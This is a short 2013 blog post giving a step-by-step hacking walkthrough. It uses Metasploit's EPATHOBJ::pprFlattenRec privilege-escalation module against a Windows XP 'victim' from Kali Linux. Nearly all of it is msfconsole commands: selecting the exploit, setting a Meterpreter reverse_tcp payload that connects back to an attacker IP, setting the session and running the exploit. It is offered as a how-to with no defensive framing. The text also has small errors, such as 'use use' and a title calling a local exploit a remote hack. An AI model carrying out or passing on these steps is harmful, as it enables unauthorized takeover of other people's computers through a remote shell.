By ro0ted | December 15, 2013 - 11:41 | Posted in /b/ | Comments Off on #ro0ted Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
#ro0ted Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
This module exploits vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
Windows XP SP 3
Attacker: Kali Linux
Victim PC: Windows XP
First Hack the Victim PC Using Metaspolit
Open Kali Linux terminal type??msfconsole
Now type use use exploit/windows/local/ppr_flatten_rec
msf exploit (ppr_flatten_rec)>set payload windows/meterpreter/reverse_tcp
msf exploit (ppr_flatten_rec)>set lhost 192.168.1.103 (IP of Local Host)
msf exploit (ppr_flatten_rec)>set session 1
msf exploit (ppr_flatten_rec)>exploit
(Visited 16 times, 1 visits today)
- You can follow any responses to this entry through the RSS 2.0 feed.
- Both comments and pings are currently closed.